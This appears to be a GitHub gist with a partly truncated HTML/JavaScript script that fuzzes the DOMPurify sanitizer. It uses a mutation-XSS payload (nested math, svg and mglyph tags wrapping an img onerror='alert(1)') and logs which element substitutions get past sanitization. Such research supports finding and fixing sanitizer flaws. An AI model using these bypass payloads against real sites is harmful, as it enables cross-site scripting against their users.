Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]> <html class="no-js"> <!--<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="">
<!--[if lt IE 7]>
<p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="#">upgrade your browser</a> to improve your experience.</p>
<script src=""></script>
window.onload = () => {
const allElements = [
const payload = `<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">`;
const domParser = new DOMParser();
allElements.forEach(element => {
let newPayload = payload.replace("<style>", `<${element}>`).replace("</style>", `</${element}>`);
const sanitized = DOMPurify.sanitize(newPayload, {
ADD_ATTR: ["target"],
FORBID_TAGS: ["style"]
const parsedDOM = domParser.parseFromString(sanitized, 'text/html');
parsedDOM.querySelectorAll(`img`).forEach(img => {
if(img.attributes["onerror"]) {
console.log(`Found bypass: ${element}`);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment